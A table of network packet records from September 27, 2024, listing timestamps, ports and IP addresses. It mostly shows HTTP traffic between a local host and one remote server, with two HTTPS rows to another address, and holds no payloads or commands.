Sep 27, 2024 01:38:22.167407036 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167418957 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.167442083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167521954 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167550087 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.167574883 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.167598009 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.175183058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175271034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175286055 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175302029 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175323009 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175338984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175354958 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175358057 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.175370932 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175393105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175431013 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175442934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175471067 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.175472975 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175471067 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.175471067 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.175471067 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.175554037 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.175604105 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.255125046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255165100 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255249977 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.255354881 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255422115 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255455971 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255476952 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.255506992 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255573988 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255604982 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255626917 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.255655050 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255657911 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.255687952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255738020 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255769968 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255778074 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.255805016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255894899 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.255918980 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.255943060 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.256740093 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.256789923 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.256824017 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.256838083 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.256855965 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.256890059 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.256922007 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.256941080 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.256954908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.256989956 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.257006884 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.257042885 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.257057905 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.257092953 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.257126093 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.257142067 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.257158995 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.257210970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.257220030 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.266400099 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266477108 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.266541004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266573906 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266606092 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266629934 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.266655922 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266690016 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266722918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266745090 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.266756058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266767025 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.266788960 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266824007 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266839981 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.266858101 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266891956 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266906977 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.266925097 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.266958952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.267011881 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346065044 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346138000 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346174002 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346210003 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346221924 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346244097 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346276999 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346302032 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346381903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346415997 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346448898 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346451044 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346482038 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346503019 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346515894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346533060 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346548080 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346601963 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346642017 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346654892 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346673012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346720934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346724987 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346755981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346760035 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346787930 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346818924 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346833944 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346869946 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346920967 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346954107 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.346963882 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.346987963 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.347002983 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.347021103 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.347054958 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.347085953 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.347085953 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.347120047 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.347155094 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.347170115 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.347213984 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.355634928 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355686903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355721951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355746984 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.355753899 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355792046 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355818987 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.355849981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355901003 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355901957 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.355935097 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355968952 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.355990887 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.356000900 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.356034994 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.356065989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.356081963 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.356100082 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.356132030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.356148005 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.356173038 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.437700987 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437721968 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437743902 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437757969 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437772989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437789917 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437789917 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.437807083 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437818050 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.437832117 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437833071 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.437849045 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437864065 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437880039 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.437906981 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437910080 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.437926054 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.437973022 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.438013077 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438041925 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438159943 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.438211918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438251972 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438290119 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.438416004 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438438892 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438453913 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438472986 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.438493013 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438508034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438522100 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438535929 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438544035 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.438553095 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438566923 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438569069 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.438575029 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438599110 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.438622952 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.438934088 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438947916 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438963890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438975096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.438997030 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.439024925 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.446753025 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.446768045 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.446784019 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.446796894 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.446811914 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.446832895 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.446868896 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.446971893 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.446986914 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.447000980 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.447005987 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.447017908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.447035074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.447048903 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.447048903 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.447063923 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.447072029 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.447079897 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.447096109 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.447097063 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.447139025 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.447612047 CEST	443	49749	104.21.77.130	192.168.2.7
Sep 27, 2024 01:38:22.448014975 CEST	49749	443	192.168.2.7	104.21.77.130
Sep 27, 2024 01:38:22.527199030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.527271032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.527307034 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.527339935 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.527375937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.527395964 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.527395964 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.527427912 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.527467012 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.527497053 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.527514935 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.527543068 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528013945 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528109074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528143883 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528166056 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528196096 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528250933 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528285980 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528305054 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528320074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528353930 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528373003 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528394938 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528404951 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528439999 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528474092 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528487921 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528507948 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528537035 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528569937 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528570890 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528604031 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528637886 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528655052 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528672934 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528706074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528723955 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528749943 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.528762102 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528796911 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.528867006 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.535929918 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.535985947 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536015987 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536062956 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.536067009 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536101103 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536154032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536159039 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.536189079 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536223888 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536248922 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.536257029 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536271095 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.536293030 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536344051 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536344051 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.536381960 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536415100 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536442995 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.536449909 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536480904 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.536536932 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.617211103 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617252111 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617301941 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617326975 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.617336035 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617371082 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617400885 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.617403984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617439032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617453098 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.617475033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617528915 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.617716074 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617770910 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617804050 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617835045 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.617839098 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618020058 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618072033 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618072987 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618108988 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618165970 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618172884 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618201017 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618213892 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618238926 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618271112 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618289948 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618323088 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618371964 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618405104 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618422985 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618441105 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618474960 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618485928 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618530989 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618563890 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618583918 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618597984 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618609905 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.618633032 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.618684053 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.619447947 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.619498014 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.620318890 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.625967026 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626020908 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626070023 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626106024 CEST	80	49743	147.45.44.104	192.168.2.7
Sep 27, 2024 01:38:22.626121998 CEST	49743	80	192.168.2.7	147.45.44.104
Sep 27, 2024 01:38:22.626157045 CEST	80	49743	147.45.44.104	192.168.2.7
